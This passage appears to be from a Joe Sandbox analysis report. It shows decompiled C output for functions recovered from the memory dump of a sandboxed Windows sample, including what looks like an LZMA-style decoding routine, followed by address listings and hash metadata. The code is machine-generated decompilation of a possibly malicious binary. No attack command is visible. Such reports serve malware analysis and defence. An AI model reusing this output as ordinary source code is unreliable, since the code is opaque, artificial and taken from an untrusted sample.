												__eflags =  *(_t226 - 0x18) - _t211;
												if( *(_t226 - 0x18) == _t211) {
													_t160 = E0040DBF4( *((intOrPtr*)(_t175 + 0x18)), _t211);
													_t184 =  *((intOrPtr*)(_t226 + 0xc));
													 *(_t226 - 0x18) = _t211;
													 *(_t226 - 0x1c) = _t160;
													_t211 = 0;
													__eflags = 0;
												}
											}
											_t215 =  *(_t223 + 8);
											 *(_t226 - 0x10) = _t211;
											__eflags = _t215 - _t211;
											 *(_t226 + 8) = _t211;
											if(_t215 <= _t211) {
												L37:
												_t136 =  *(_t226 - 0x1c);
												__eflags = _t136 - 0xa;
												if(_t136 != 0xa) {
													L48:
													_t137 = _t136 |  *(_t226 - 0x18);
													__eflags = _t137;
													if(_t137 == 0) {
														_t185 =  *((intOrPtr*)(_t226 + 0x14));
														__eflags =  *((intOrPtr*)(_t185 + 8)) - _t211;
														if( *((intOrPtr*)(_t185 + 8)) != _t211) {
															L54:
															 *[fs:0x0] =  *((intOrPtr*)(_t226 - 0xc));
															return _t137;
														}
														E0040D9F9(_t185,  *(_t226 + 8));
														_t137 = E004042D6();
														_t225 =  *(_t226 + 8);
														__eflags = _t225;
														if(_t225 <= 0) {
															goto L54;
														} else {
															goto L53;
														}
														do {
															L53:
															_t137 = E004039DF( *((intOrPtr*)(_t226 + 0x18)), 0);
															_t225 = _t225 - 1;
															__eflags = _t225;
														} while (_t225 != 0);
														goto L54;
													}
													E0040DBE1( *((intOrPtr*)(_t175 + 0x18)), _t211);
													L50:
													 *(_t226 - 0x1c) = E0040DBF4( *((intOrPtr*)(_t175 + 0x18)), _t211);
													 *(_t226 - 0x18) = _t211;
													goto L36;
												}
												__eflags =  *(_t226 - 0x18) - _t211;
												if(__eflags != 0) {
													goto L48;
												}
												 *(_t226 - 0x48) = _t211;
												 *(_t226 - 0x44) = _t211;
												 *(_t226 - 0x40) = _t211;
												 *((intOrPtr*)(_t226 - 0x3c)) = 1;
												 *((intOrPtr*)(_t226 - 0x4c)) = 0x41b748;
												 *(_t226 - 4) = _t211;
												 *(_t226 - 0x34) = _t211;
												 *(_t226 - 0x30) = _t211;
												 *(_t226 - 0x2c) = _t211;
												 *((intOrPtr*)(_t226 - 0x28)) = 4;
												 *((intOrPtr*)(_t226 - 0x38)) = 0x41b684;
												 *(_t226 - 4) = 1;
												E0040E23F(_t175, __eflags,  *(_t226 - 0x10), _t226 - 0x4c, _t226 - 0x38);
												_t177 = 0;
												__eflags =  *(_t223 + 8);
												 *(_t226 + 0x10) = 0;
												if( *(_t223 + 8) <= 0) {
													L47:
													 *(_t226 - 4) =  *(_t226 - 4) & 0x00000000;
													E004042AD(_t226 - 0x38);
													 *(_t226 - 4) =  *(_t226 - 4) | 0xffffffff;
													E004042AD(_t226 - 0x4c);
													_t175 =  *((intOrPtr*)(_t226 - 0x14));
													goto L50;
												} else {
													goto L40;
												}
												do {
													L40:
													_t217 =  *((intOrPtr*)( *((intOrPtr*)(_t223 + 0xc)) + _t177 * 4));
													_t148 =  *( *((intOrPtr*)( *((intOrPtr*)(_t226 + 0xc)) + 0xc)) + _t177 * 4);
													__eflags = _t148 - 1;
													if(_t148 != 1) {
														L43:
														__eflags = _t148;
														if(_t148 <= 0) {
															goto L46;
														}
														_t218 = _t148;
														do {
															E0040C413( *((intOrPtr*)(_t226 + 0x14)),  *((intOrPtr*)( *(_t226 - 0x40) +  *(_t226 + 0x10))));
															E004039DF( *((intOrPtr*)(_t226 + 0x18)),  *((intOrPtr*)( *(_t226 - 0x2c) +  *(_t226 + 0x10) * 4)));
															 *(_t226 + 0x10) =  *(_t226 + 0x10) + 1;
															_t218 = _t218 - 1;
															__eflags = _t218;
														} while (_t218 != 0);
														goto L46;
													}
													__eflags =  *((char*)(_t217 + 0x54));
													if( *((char*)(_t217 + 0x54)) == 0) {
														goto L43;
													}
													E0040C413( *((intOrPtr*)(_t226 + 0x14)), _t148);
													E004039DF( *((intOrPtr*)(_t226 + 0x18)),  *((intOrPtr*)(_t217 + 0x50)));
													L46:
													_t177 = _t177 + 1;
													__eflags = _t177 -  *(_t223 + 8);
												} while (_t177 <  *(_t223 + 8));
												goto L47;
											} else {
												 *(_t226 + 0x10) =  *(_t184 + 0xc);
												do {
													_t201 =  *((intOrPtr*)( *(_t226 + 0x10) + _t211 * 4));
													__eflags = _t201 - 1;
													if(_t201 != 1) {
														L34:
														_t64 = _t226 - 0x10;
														 *_t64 =  *(_t226 - 0x10) + _t201;
														__eflags =  *_t64;
														goto L35;
													}
													_t159 =  *((intOrPtr*)( *((intOrPtr*)(_t223 + 0xc)) + _t211 * 4));
													__eflags =  *((char*)(_t159 + 0x54));
													if( *((char*)(_t159 + 0x54)) != 0) {
														goto L35;
													}
													goto L34;
													L35:
													 *(_t226 + 8) =  *(_t226 + 8) + _t201;
													_t211 = _t211 + 1;
													__eflags = _t211 - _t215;
												} while (_t211 < _t215);
												L36:
												_t211 = 0;
												__eflags = 0;
												goto L37;
											}
										} else {
											goto L18;
										}
										do {
											L18:
											_t162 =  *((intOrPtr*)( *(_t184 + 0xc) + _t214 * 4));
											__eflags = _t162 - _t211;
											if(_t162 == _t211) {
												goto L26;
											}
											__eflags = _t162 - 1;
											 *(_t226 - 0x24) = _t211;
											 *(_t226 - 0x20) = _t211;
											if(_t162 <= 1) {
												L25:
												_t164 = E0040C281( *((intOrPtr*)( *((intOrPtr*)(_t223 + 0xc)) + _t214 * 4)));
												asm("sbb edx, [ebp-0x20]");
												E0040F953( *(_t226 + 0x10), _t164 -  *(_t226 - 0x24), _t211);
												_t184 =  *((intOrPtr*)(_t226 + 0xc));
												_t211 = 0;
												__eflags = 0;
												goto L26;
											}
											_t167 = _t162 - 1;
											__eflags = _t167;
											 *(_t226 + 8) = _t167;
											do {
												__eflags =  *(_t226 - 0x1c) - 9;
												if( *(_t226 - 0x1c) == 9) {
													__eflags =  *(_t226 - 0x18) - _t211;
													if( *(_t226 - 0x18) == _t211) {
														_t219 = E0040DBF4( *((intOrPtr*)(_t175 + 0x18)), _t211);
														E0040F953( *(_t226 + 0x10), _t219, _t211);
														 *(_t226 - 0x24) =  *(_t226 - 0x24) + _t219;
														_t214 =  *(_t226 - 0x10);
														asm("adc [ebp-0x20], ebx");
														_t175 =  *((intOrPtr*)(_t226 - 0x14));
														_t211 = 0;
														__eflags = 0;
													}
												}
												_t36 = _t226 + 8;
												 *_t36 =  *(_t226 + 8) - 1;
												__eflags =  *_t36;
											} while ( *_t36 != 0);
											goto L25;
											L26:
											_t214 = _t214 + 1;
											__eflags = _t214 -  *((intOrPtr*)(_t184 + 8));
											 *(_t226 - 0x10) = _t214;
										} while (_t214 <  *((intOrPtr*)(_t184 + 8)));
										goto L27;
									}
									_t220 = 0;
									__eflags =  *(_t223 + 8) - _t211;
									if( *(_t223 + 8) <= _t211) {
										goto L17;
									} else {
										goto L15;
									}
									do {
										L15:
										E004039DF( *((intOrPtr*)(_t226 + 0xc)), 1);
										_t220 = _t220 + 1;
										__eflags = _t220 -  *(_t223 + 8);
									} while (_t220 <  *(_t223 + 8));
									_t211 = 0;
									__eflags = 0;
									goto L17;
								}
								E0040DBE1( *((intOrPtr*)(_t175 + 0x18)), _t211);
								while(1) {
									_t133 = E0040DBF4( *((intOrPtr*)(_t175 + 0x18)), _t211);
									_t183 = _t211;
									 *(_t226 - 0x1c) = _t133;
									 *(_t226 - 0x18) = _t183;
									if(_t133 != 0xd) {
										goto L6;
									}
									goto L2;
								}
								goto L6;
							}
							__eflags = _t183 - _t211;
							if(_t183 == _t211) {
								goto L13;
							}
							goto L11;
						}
						__eflags = _t183 - _t211;
						if(_t183 == _t211) {
							goto L13;
						}
						goto L9;
					}
					_t221 = 0;
					if( *(_t223 + 8) <= 0) {
						continue;
					} else {
						goto L4;
					}
					do {
						L4:
						E004039DF( *((intOrPtr*)(_t226 + 0xc)), E0040DC90(0));
						_t221 = _t221 + 1;
					} while (_t221 <  *(_t223 + 8));
					continue;
					L6:
					_t211 = 0;
					__eflags = 0;
					goto L7;
				}
			}






























                              0x0040e5a5
                              0x0040e5aa
                              0x0040e5b3
                              0x0040e5ba
                              0x0040e5bd
                              0x0040e5c2
                              0x0040e5cb
                              0x0040e5d0
                              0x0040e5d3
                              0x0040e5d8
                              0x0040e5dd
                              0x0040e5e0
                              0x0040e5e3
                              0x00000000
                              0x00000000
                              0x0040e5e5
                              0x0040e5e5
                              0x0040e5e9
                              0x0040e60d
                              0x0040e60d
                              0x0040e610
                              0x0040e616
                              0x0040e616
                              0x0040e619
                              0x0040e61f
                              0x0040e61f
                              0x0040e621
                              0x0040e62d
                              0x0040e62d
                              0x0040e630
                              0x0040e633
                              0x0040e64e
                              0x0040e64e
                              0x0040e651
                              0x0040e653
                              0x0040e656
                              0x0040e659
                              0x0040e6d1
                              0x0040e6d1
                              0x0040e6d5
                              0x0040e6d7
                              0x0040e6da
                              0x0040e6df
                              0x0040e6e4
                              0x0040e6e7
                              0x0040e6ea
                              0x0040e6ed
                              0x0040e6ed
                              0x0040e6ed
                              0x0040e6da
                              0x0040e6ef
                              0x0040e6f2
                              0x0040e6f5
                              0x0040e6f7
                              0x0040e6fa
                              0x0040e726
                              0x0040e726
                              0x0040e729
                              0x0040e72c
                              0x0040e80e
                              0x0040e80e
                              0x0040e80e
                              0x0040e811
                              0x0040e82e
                              0x0040e831
                              0x0040e834
                              0x0040e85a
                              0x0040e860
                              0x0040e868
                              0x0040e868
                              0x0040e839
                              0x0040e841
                              0x0040e846
                              0x0040e849
                              0x0040e84b
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040e84d
                              0x0040e84d
                              0x0040e852
                              0x0040e857
                              0x0040e857
                              0x0040e857
                              0x00000000
                              0x0040e84d
                              0x0040e816
                              0x0040e81b
                              0x0040e823
                              0x0040e826
                              0x00000000
                              0x0040e826
                              0x0040e732
                              0x0040e735
                              0x00000000
                              0x00000000
                              0x0040e73b
                              0x0040e73e
                              0x0040e741
                              0x0040e744
                              0x0040e74b
                              0x0040e752
                              0x0040e755
                              0x0040e758
                              0x0040e75b
                              0x0040e75e
                              0x0040e765
                              0x0040e776
                              0x0040e77d
                              0x0040e782
                              0x0040e784
                              0x0040e787
                              0x0040e78a
                              0x0040e7f1
                              0x0040e7f1
                              0x0040e7f8
                              0x0040e7fd
                              0x0040e804
                              0x0040e809
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040e78c
                              0x0040e78c
                              0x0040e795
                              0x0040e798
                              0x0040e79b
                              0x0040e79e
                              0x0040e7bc
                              0x0040e7bc
                              0x0040e7be
                              0x00000000
                              0x00000000
                              0x0040e7c0
                              0x0040e7c2
                              0x0040e7cf
                              0x0040e7e0
                              0x0040e7e5
                              0x0040e7e8
                              0x0040e7e8
                              0x0040e7e8
                              0x00000000
                              0x0040e7c2
                              0x0040e7a0
                              0x0040e7a4
                              0x00000000
                              0x00000000
                              0x0040e7aa
                              0x0040e7b5
                              0x0040e7eb
                              0x0040e7eb
                              0x0040e7ec
                              0x0040e7ec
                              0x00000000
                              0x0040e6fc
                              0x0040e6ff
                              0x0040e702
                              0x0040e705
                              0x0040e708
                              0x0040e70b
                              0x0040e719
                              0x0040e719
                              0x0040e719
                              0x0040e719
                              0x00000000
                              0x0040e719
                              0x0040e710
                              0x0040e713
                              0x0040e717
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040e71c
                              0x0040e71c
                              0x0040e71f
                              0x0040e720
                              0x0040e720
                              0x0040e724
                              0x0040e724
                              0x0040e724
                              0x00000000
                              0x0040e724
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040e65b
                              0x0040e65b
                              0x0040e65e
                              0x0040e661
                              0x0040e663
                              0x00000000
                              0x00000000
                              0x0040e665
                              0x0040e668
                              0x0040e66b
                              0x0040e66e
                              0x0040e6a8
                              0x0040e6ae
                              0x0040e6b9
                              0x0040e6be
                              0x0040e6c3
                              0x0040e6c6
                              0x0040e6c6
                              0x00000000
                              0x0040e6c6
                              0x0040e670
                              0x0040e670
                              0x0040e671
                              0x0040e674
                              0x0040e674
                              0x0040e678
                              0x0040e67a
                              0x0040e67d
                              0x0040e68c
                              0x0040e690
                              0x0040e695
                              0x0040e698
                              0x0040e69b
                              0x0040e69e
                              0x0040e6a1
                              0x0040e6a1
                              0x0040e6a1
                              0x0040e67d
                              0x0040e6a3
                              0x0040e6a3
                              0x0040e6a3
                              0x0040e6a3
                              0x00000000
                              0x0040e6c8
                              0x0040e6c8
                              0x0040e6c9
                              0x0040e6cc
                              0x0040e6cc
                              0x00000000
                              0x0040e65b
                              0x0040e635
                              0x0040e637
                              0x0040e63a
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040e63c
                              0x0040e63c
                              0x0040e641
                              0x0040e646
                              0x0040e647
                              0x0040e647
                              0x0040e64c
                              0x0040e64c
                              0x00000000
                              0x0040e64c
                              0x0040e626
                              0x0040e5d0
                              0x0040e5d3
                              0x0040e5d8
                              0x0040e5dd
                              0x0040e5e0
                              0x0040e5e3
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040e5e3
                              0x00000000
                              0x0040e5d0
                              0x0040e61b
                              0x0040e61d
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040e61d
                              0x0040e612
                              0x0040e614
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040e614
                              0x0040e5eb
                              0x0040e5f0
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040e5f2
                              0x0040e5f2
                              0x0040e5fe
                              0x0040e603
                              0x0040e604
                              0x00000000
                              0x0040e60b
                              0x0040e60b
                              0x0040e60b
                              0x00000000
                              0x0040e60b

                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              • Opcode ID: b07fb5bf97a2b1aa00d72e408e60a61c646f09191d68c079a122928f862f61c3
                              • Instruction ID: 21f6de2b17b1780f59bfe67bff07a3778763215a5d034522e7ff50d1aecbc74d
                              • Opcode Fuzzy Hash: b07fb5bf97a2b1aa00d72e408e60a61c646f09191d68c079a122928f862f61c3
                              • Instruction Fuzzy Hash: 86A1FA70E002099FCB18DF96C4919AEB7B2FFA4314F14887FE815A7291DB39AD61CB54
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004126B0 Relevance: .5, Instructions: 481COMMONCrypto
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E004126B0(void* __eax, signed int* __ecx) {
				intOrPtr _t149;
				unsigned int _t153;
				signed int _t157;
				signed int _t158;
				intOrPtr _t159;
				signed int _t160;
				signed int _t161;
				signed char* _t162;
				signed int _t164;
				intOrPtr _t167;
				signed int _t168;
				signed char* _t169;
				signed int _t171;
				signed char* _t179;
				signed int _t190;
				signed int _t192;
				signed int _t196;
				signed char* _t197;
				signed char* _t199;
				signed int _t204;
				signed short* _t205;
				void* _t206;
				signed int _t207;
				signed int _t215;
				signed int _t216;
				signed char* _t225;
				signed int _t228;
				signed int _t232;
				signed int _t235;
				signed int _t238;
				signed int _t241;
				signed int _t244;
				signed int _t247;
				signed char _t251;
				void* _t252;
				signed int _t265;
				signed int _t270;
				signed int _t271;
				signed int _t272;
				signed int _t278;
				signed char* _t279;
				signed int _t281;
				signed int _t283;
				signed int _t284;
				signed int _t285;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t289;
				signed int _t290;
				unsigned int _t291;
				signed int* _t292;
				intOrPtr _t293;
				signed char* _t294;
				signed short* _t296;
				signed int _t297;
				signed int _t298;
				signed int _t300;
				signed int _t301;
				signed int _t310;
				signed int _t314;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				signed int _t323;
				signed int _t324;
				signed int _t325;
				signed int _t340;
				signed int _t341;
				signed int _t342;
				signed char* _t344;
				void* _t351;

				_t292 = __ecx;
				_t340 =  *(__ecx + 0x34);
				_t283 =  *(__ecx + 0x1c);
				_t321 =  *(__ecx + 0x20);
				_t149 =  *((intOrPtr*)(__ecx + 0x10));
				 *(_t351 + 0x10) =  &(( *(_t351 + 0x28))[__eax]);
				 *((intOrPtr*)(_t351 + 0x14)) = _t149;
				_t204 = (0x00000001 <<  *(__ecx + 8)) - 0x00000001 &  *(__ecx + 0x2c);
				 *(_t351 + 0x18) =  *(_t149 + ((_t340 << 4) + 1) * 2) & 0x0000ffff;
				if(_t283 >= 0x1000000) {
					L4:
					_t153 = (_t283 >> 0xb) *  *(_t351 + 0x18);
					if(_t321 >= _t153) {
						_t293 =  *((intOrPtr*)(_t351 + 0x14));
						_t225 =  *(_t351 + 0x28);
						_t284 = _t283 - _t153;
						_t322 = _t321 - _t153;
						 *(_t351 + 0x18) =  *(_t293 + 0x180 + _t340 * 2) & 0x0000ffff;
						if(_t284 >= 0x1000000) {
							L39:
							_t157 = (_t284 >> 0xb) *  *(_t351 + 0x18);
							if(_t322 >= _t157) {
								_t285 = _t284 - _t157;
								_t323 = _t322 - _t157;
								_t158 =  *(_t293 + 0x198 + _t340 * 2) & 0x0000ffff;
								 *(_t351 + 0x1c) = 3;
								if(_t285 >= 0x1000000) {
									L44:
									_t228 = (_t285 >> 0xb) * _t158;
									_t159 =  *((intOrPtr*)(_t351 + 0x14));
									if(_t323 >= _t228) {
										_t294 =  *(_t351 + 0x28);
										_t286 = _t285 - _t228;
										_t324 = _t323 - _t228;
										 *(_t351 + 0x18) =  *(_t159 + 0x1b0 + _t340 * 2) & 0x0000ffff;
										if(_t286 >= 0x1000000) {
											L55:
											_t232 = (_t286 >> 0xb) *  *(_t351 + 0x18);
											if(_t324 >= _t232) {
												_t160 =  *(_t159 + 0x1c8 + _t340 * 2) & 0x0000ffff;
												_t287 = _t286 - _t232;
												_t323 = _t324 - _t232;
												if(_t287 >= 0x1000000) {
													L60:
													_t235 = (_t287 >> 0xb) * _t160;
													if(_t323 >= _t235) {
														goto L62;
													} else {
														_t288 = _t235;
													}
													goto L63;
												} else {
													if(_t294 >=  *(_t351 + 0x10)) {
														goto L2;
													} else {
														_t287 = _t287 << 8;
														_t323 = _t323 << 0x00000008 |  *_t294 & 0x000000ff;
														 *(_t351 + 0x28) =  &(_t294[1]);
														goto L60;
													}
												}
											} else {
												_t288 = _t232;
												goto L63;
											}
										} else {
											if(_t294 >=  *(_t351 + 0x10)) {
												goto L2;
											} else {
												_t286 = _t286 << 8;
												_t324 = _t324 << 0x00000008 |  *_t294 & 0x000000ff;
												_t294 =  &(_t294[1]);
												 *(_t351 + 0x28) = _t294;
												goto L55;
											}
										}
									} else {
										_t314 =  *(_t159 + ((_t340 + 0xf << 4) + _t204) * 2) & 0x0000ffff;
										_t179 =  *(_t351 + 0x28);
										_t287 = _t228;
										if(_t228 >= 0x1000000) {
											L48:
											_t235 = (_t287 >> 0xb) * _t314;
											if(_t323 >= _t235) {
												L62:
												_t288 = _t287 - _t235;
												_t323 = _t323 - _t235;
												L63:
												_t225 =  *(_t351 + 0x28);
												 *(_t351 + 0x20) = 0xc;
												_t296 =  *((intOrPtr*)(_t351 + 0x14)) + 0xa68;
												goto L64;
											} else {
												if(_t235 >= 0x1000000 || _t179 <  *(_t351 + 0x10)) {
													return 3;
												} else {
													goto L2;
												}
											}
										} else {
											if(_t179 >=  *(_t351 + 0x10)) {
												goto L2;
											} else {
												_t287 = _t228 << 8;
												_t323 = _t323 << 0x00000008 |  *_t179 & 0x000000ff;
												_t179 =  &(_t179[1]);
												 *(_t351 + 0x28) = _t179;
												goto L48;
											}
										}
									}
								} else {
									if(_t225 >=  *(_t351 + 0x10)) {
										goto L2;
									} else {
										_t285 = _t285 << 8;
										_t323 = _t323 << 0x00000008 |  *_t225 & 0x000000ff;
										 *(_t351 + 0x28) =  &(_t225[1]);
										goto L44;
									}
								}
							} else {
								_t288 = _t157;
								 *(_t351 + 0x20) = 0;
								_t296 = _t293 + 0x664;
								 *(_t351 + 0x1c) = 2;
								L64:
								_t161 =  *_t296 & 0x0000ffff;
								if(_t288 >= 0x1000000) {
									L67:
									_t238 = (_t288 >> 0xb) * _t161;
									_t162 =  *(_t351 + 0x28);
									if(_t323 >= _t238) {
										_t341 = _t296[1] & 0x0000ffff;
										_t289 = _t288 - _t238;
										_t325 = _t323 - _t238;
										if(_t289 >= 0x1000000) {
											L72:
											_t241 = (_t289 >> 0xb) * _t341;
											if(_t325 >= _t241) {
												_t290 = _t289 - _t241;
												_t325 = _t325 - _t241;
												_t205 =  &(_t296[0x102]);
												_t342 = 0x10;
												 *(_t351 + 0x18) = 0x100;
											} else {
												_t342 = 8;
												_t290 = _t241;
												_t205 = _t296 + 0x104 + (_t204 + _t204) * 8;
												 *(_t351 + 0x18) = 8;
											}
											goto L75;
										} else {
											if(_t162 >=  *(_t351 + 0x10)) {
												goto L2;
											} else {
												_t289 = _t289 << 8;
												_t325 = _t325 << 0x00000008 |  *_t162 & 0x000000ff;
												_t162 =  &(_t162[1]);
												 *(_t351 + 0x28) = _t162;
												goto L72;
											}
										}
									} else {
										_t290 = _t238;
										_t205 = _t296 + 4 + (_t204 + _t204) * 8;
										_t342 = 0;
										 *(_t351 + 0x18) = 8;
										L75:
										_t297 = 1;
										L76:
										while(1) {
											if(_t290 >= 0x1000000) {
												L79:
												_t244 = (_t290 >> 0xb) * (_t205[_t297] & 0x0000ffff);
												if(_t325 >= _t244) {
													_t290 = _t290 - _t244;
													_t325 = _t325 - _t244;
													_t297 = _t297 + _t297 + 1;
												} else {
													_t290 = _t244;
													_t297 = _t297 + _t297;
												}
												_t164 =  *(_t351 + 0x18);
												if(_t297 >= _t164) {
													_t298 = _t297 + _t342 - _t164;
													if( *(_t351 + 0x20) >= 4) {
														goto L20;
													} else {
														if(_t298 >= 4) {
															_t298 = 3;
														}
														_t167 =  *((intOrPtr*)(_t351 + 0x14));
														_t344 =  *(_t351 + 0x28);
														_t128 = _t167 + 0x360; // 0x363
														_t206 = (_t298 << 7) + _t128;
														_t300 = 1;
														do {
															_t168 =  *(_t206 + _t300 * 2) & 0x0000ffff;
															if(_t290 >= 0x1000000) {
																goto L91;
															} else {
																if(_t344 >=  *(_t351 + 0x10)) {
																	goto L2;
																} else {
																	_t290 = _t290 << 8;
																	_t325 = _t325 << 0x00000008 |  *_t344 & 0x000000ff;
																	_t344 =  &(_t344[1]);
																	goto L91;
																}
															}
															goto L113;
															L91:
															_t247 = (_t290 >> 0xb) * _t168;
															if(_t325 >= _t247) {
																_t290 = _t290 - _t247;
																_t325 = _t325 - _t247;
																_t300 = _t300 + _t300 + 1;
															} else {
																_t290 = _t247;
																_t300 = _t300 + _t300;
															}
														} while (_t300 < 0x40);
														_t301 = _t300 - 0x40;
														if(_t301 < 4) {
															goto L21;
														} else {
															_t251 = (_t301 >> 1) - 1;
															if(_t301 >= 0xe) {
																_t169 =  *(_t351 + 0x10);
																_t252 = _t251 - 4;
																do {
																	if(_t290 >= 0x1000000) {
																		goto L102;
																	} else {
																		if(_t344 >= _t169) {
																			goto L2;
																		} else {
																			_t290 = _t290 << 8;
																			_t325 = _t325 << 0x00000008 |  *_t344 & 0x000000ff;
																			_t344 =  &(_t344[1]);
																			goto L102;
																		}
																	}
																	goto L113;
																	L102:
																	_t290 = _t290 >> 1;
																	_t325 = _t325 - ((_t325 - _t290 >> 0x0000001f) - 0x00000001 & _t290);
																	_t252 = _t252 - 1;
																} while (_t252 != 0);
																 *((intOrPtr*)(_t351 + 0x14)) =  *((intOrPtr*)(_t351 + 0x14)) + 0x644;
																_t251 = 4;
																goto L104;
															} else {
																 *((intOrPtr*)(_t351 + 0x14)) =  *((intOrPtr*)(_t351 + 0x14)) + 0x55e + (((_t301 & 0x00000001 | 0x00000002) << _t251) - _t301) * 2;
																L104:
																_t207 = 1;
																do {
																	_t171 =  *( *((intOrPtr*)(_t351 + 0x14)) + _t207 * 2) & 0x0000ffff;
																	if(_t290 >= 0x1000000) {
																		goto L108;
																	} else {
																		if(_t344 >=  *(_t351 + 0x10)) {
																			goto L2;
																		} else {
																			_t290 = _t290 << 8;
																			_t325 = _t325 << 0x00000008 |  *_t344 & 0x000000ff;
																			_t344 =  &(_t344[1]);
																			goto L108;
																		}
																	}
																	goto L113;
																	L108:
																	_t310 = (_t290 >> 0xb) * _t171;
																	if(_t325 >= _t310) {
																		_t290 = _t290 - _t310;
																		_t325 = _t325 - _t310;
																		_t207 = _t207 + _t207 + 1;
																	} else {
																		_t290 = _t310;
																		_t207 = _t207 + _t207;
																	}
																	_t251 = _t251 - 1;
																} while (_t251 != 0);
																goto L21;
															}
														}
													}
												} else {
													_t162 =  *(_t351 + 0x28);
													continue;
												}
											} else {
												if(_t162 >=  *(_t351 + 0x10)) {
													goto L2;
												} else {
													_t290 = _t290 << 8;
													_t325 = _t325 << 0x00000008 |  *_t162 & 0x000000ff;
													 *(_t351 + 0x28) =  &(_t162[1]);
													goto L79;
												}
											}
											goto L113;
										}
									}
								} else {
									if(_t225 >=  *(_t351 + 0x10)) {
										goto L2;
									} else {
										_t288 = _t288 << 8;
										_t323 = _t323 << 0x00000008 |  *_t225 & 0x000000ff;
										 *(_t351 + 0x28) =  &(_t225[1]);
										goto L67;
									}
								}
							}
						} else {
							if(_t225 >=  *(_t351 + 0x10)) {
								goto L2;
							} else {
								_t284 = _t284 << 8;
								_t322 = _t322 << 0x00000008 |  *_t225 & 0x000000ff;
								_t225 =  &(_t225[1]);
								 *(_t351 + 0x28) = _t225;
								goto L39;
							}
						}
					} else {
						_t291 = _t153;
						 *((intOrPtr*)(_t351 + 0x14)) =  *((intOrPtr*)(_t351 + 0x14)) + 0xe6c;
						if(_t292[0xc] != 0 || _t292[0xb] != 0) {
							_t265 = _t292[9];
							if(_t265 == 0) {
								_t265 = _t292[0xa];
							}
							 *((intOrPtr*)(_t351 + 0x14)) =  *((intOrPtr*)(_t351 + 0x14)) + ((( *(_t292[5] + _t265 - 1) & 0x000000ff) >> 8 -  *_t292) + (((0x00000001 << _t292[1]) - 0x00000001 & _t292[0xb]) <<  *_t292)) * 0x600;
						}
						if(_t340 >= 7) {
							_t270 = _t292[9];
							_t215 = _t292[0xe];
							if(_t270 >= _t215) {
								_t190 = 0;
							} else {
								_t190 = _t292[0xa];
							}
							_t271 =  *(_t292[5] - _t215 + _t270 + _t190) & 0x000000ff;
							_t216 = 0x100;
							_t319 = 1;
							while(1) {
								_t272 = _t271 + _t271;
								_t192 = _t216 & _t272;
								 *(_t351 + 0x20) = _t272;
								 *(_t351 + 0x18) =  *( *((intOrPtr*)(_t351 + 0x14)) + (_t192 + _t319 + _t216) * 2) & 0x0000ffff;
								if(_t291 >= 0x1000000) {
									goto L31;
								}
								_t279 =  *(_t351 + 0x28);
								if(_t279 >=  *(_t351 + 0x10)) {
									goto L2;
								} else {
									_t291 = _t291 << 8;
									_t321 = _t321 << 0x00000008 |  *_t279 & 0x000000ff;
									 *(_t351 + 0x28) =  &(_t279[1]);
									goto L31;
								}
								goto L113;
								L31:
								_t278 = (_t291 >> 0xb) *  *(_t351 + 0x18);
								if(_t321 >= _t278) {
									_t290 = _t291 - _t278;
									_t321 = _t321 - _t278;
									_t319 = _t319 + _t319 + 1;
								} else {
									_t290 = _t278;
									_t319 = _t319 + _t319;
									_t192 =  !_t192;
								}
								_t216 = _t216 & _t192;
								if(_t319 >= 0x100) {
									goto L19;
								} else {
									_t271 =  *(_t351 + 0x20);
									continue;
								}
								goto L113;
							}
						} else {
							_t281 = 1;
							do {
								_t320 =  *( *((intOrPtr*)(_t351 + 0x14)) + _t281 * 2) & 0x0000ffff;
								if(_t291 >= 0x1000000) {
									goto L15;
								} else {
									_t197 =  *(_t351 + 0x28);
									if(_t197 >=  *(_t351 + 0x10)) {
										goto L2;
									} else {
										_t291 = _t291 << 8;
										_t321 = _t321 << 0x00000008 |  *_t197 & 0x000000ff;
										 *(_t351 + 0x28) =  &(_t197[1]);
										goto L15;
									}
								}
								goto L113;
								L15:
								_t196 = (_t291 >> 0xb) * _t320;
								if(_t321 >= _t196) {
									_t291 = _t291 - _t196;
									_t321 = _t321 - _t196;
									_t281 = _t281 + _t281 + 1;
								} else {
									_t291 = _t196;
									_t281 = _t281 + _t281;
								}
							} while (_t281 < 0x100);
							L19:
							 *(_t351 + 0x1c) = 1;
							L20:
							_t344 =  *(_t351 + 0x28);
							L21:
							if(_t290 >= 0x1000000 || _t344 <  *(_t351 + 0x10)) {
								return  *(_t351 + 0x1c);
							} else {
								goto L2;
							}
						}
					}
				} else {
					_t199 =  *(_t351 + 0x28);
					if(_t199 <  *(_t351 + 0x10)) {
						_t283 = _t283 << 8;
						_t321 = _t321 << 0x00000008 |  *_t199 & 0x000000ff;
						 *(_t351 + 0x28) =  &(_t199[1]);
						goto L4;
					} else {
						L2:
						return 0;
					}
				}
				L113:
			}












































































                              0x004126b7
                              0x004126bd
                              0x004126c0
                              0x004126c3
                              0x004126c8
                              0x004126cb
